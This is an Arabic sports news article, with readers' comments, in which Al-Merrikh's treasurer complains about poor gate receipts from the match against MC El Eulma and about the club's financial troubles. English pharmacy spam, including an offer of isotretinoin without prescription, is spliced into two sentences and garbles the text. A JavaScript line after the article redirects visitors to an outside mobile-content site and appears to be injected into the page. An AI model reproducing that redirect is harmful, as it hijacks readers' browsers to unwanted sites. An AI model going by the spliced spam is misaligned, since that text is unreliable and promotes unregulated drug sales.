الرئيسية / الاخبار الرياضية / امين خزينة نادي المريخ زعلان من دخل مباراة المريخ والعلمة الجزائري

امين خزينة نادي المريخ زعلان من دخل مباراة المريخ والعلمة الجزائري

imageأبدى أمين خزينة المريخ عثمان أدروب فى احاديث صحفية إمتعاضه من الحضور الجماهيري غير الكثيف في مواجهة المريخ ومولودية شباب العلمة لافتاً إلى أن مجلس الإدارة كان يعول كثيراً على دخل هذه المباراة لمساعدته في تسيير بعض شئون النادي منبهاً إلى أن المباراة حققت ما قيمته 593 ألف جنيه فقط .

ولفت أمين خزينة المريخ إلى الفشل الكبير الذي صاحب مشروع التذاكر من فئة (ألف جنيه) والتي تم طرحها بواسطة مجلس المريخ أمام المقتدرين من مشجعي النادي موضحاً أنه إضطر في نهاية الأمر إلى إتخاذ قرار بتخفيض فئات التذاكر من ذلك الرقم إلى ثلاثمائة ألف جنيه ورغم ذلك لم تحقق النجاح canada pharmacy online provides you more options to buy nexium or/and generic esomeprazole. you can order your prescription drugs online, via fax or … المطلوب، وقال أدروب إن ذلك يحمل إشارة واضحة إلى أن مجتمع المريخ إرتضى أن يقف متفرجاً على رئيس المريخ الذي يأخذ على عاتقه مهمة دفع الكثير من الأموال .

وإنتقل أدروب في تصريحاته الساخنة للحديث عن مشروع تحويل الرصيد الذي طرحه مجلس الإدارة منذ عدة أشهر وقال إن هذا المشروع حقق فشلاً ذريعاً للغاية رافضاً في الوقت نفسه الكشف عن الرقم الحقيقي الذي حصل عليه المريخ من هذه الخدمة ووصفه بالمخجل .

ويرى أمين خزينة نادي المريخ أن المخرج الوحيد للأزمة المالية التي يعيشها المريخ في الوقت الحالي هو أن يستشعر الجمهور المسئولية ويدرك حجم الضغوطات على مجلس الإدارة وأن يشرع جاداً في عملية إنجاح مشروع تحويل الرصيد والتي جدد أدروب تأكيداته على أنها لا تكلف المريخي الكثير من الوقت وأنها في متناول اليد .

وسجل عثمان أدروب صوت لوم لوزارة الشباب والرياضة الولائية على خلفية أنها إجتهدت في إقناع رئيس النادي والضباط في تأجيل ملف الإستقالات التي كانوا قد تقدموا بها مشيراً إلى أنهم تلقوا وعودات في حينها من الوزير الولائي بأنه سيتدخل لدى الدولة ويعمل على تسليمنا أموالنا التي بطرفها وأضاف: ولكن للأسف الشديد شيئاً من هذا لم يحدث وحتى الآن لم نتسلم كل المبالغ المالية الخاصة بحصول المريخ على كأس سيكافا للأندية في العام الماضي.. وسجل أدروب إشادة بجهاز الأمن والمخابرات الوطني وأكد أنه ظل يقف مع المريخ بصورة دائمة ولا يتأخر في تقديم الدعم إلى النادي.

وإتفق be sure that our trusted online-pharmacy is the best place to buy isotretinoin no prescription. buy accutane online right now and forget about your problems أدروب إلى أن العمل في الأندية الرياضية بات طارداً بالنسبة للإداريين بإعتبار الصعوبات الكبيرة التي يجدونها وفي ظل إنعدام ثقافة التسويق لدى كبرى المؤسسات الإقتصادية بالبلاد في إشارة منه لعدم وجود راعي لنادي المريخ مثل الأندية الأفريقية الأخرى التي تنافسه في ذات الدور في دوري أبطال أفريقيا، كما أشار أدروب إلى قلة الدعم الحكومي الذي يتم تقديمه إلى إدارات الأندية.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

التعليق بواسطة فيس بوك

3 تعليقات

  1. هههههههههههه لاتعليق !!!

  2. دخل شنو يا زول كان بنفخو الوالي ساي يشتري التذاكر بالغالي كلو عشان يقول الدخل اكتر من دخل الهلال ، غايتو النفخ النفخو الوالي ده للمريخ كان نفخو لتيس كان ولد

    • ياجاهل انت شوف الدخل 593 مليون وبعد دة زعلان
      الهلال لو نطط دخلو مابفوت ال200 مليون وعاوز تكلم كمان ياعديم الطموح

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*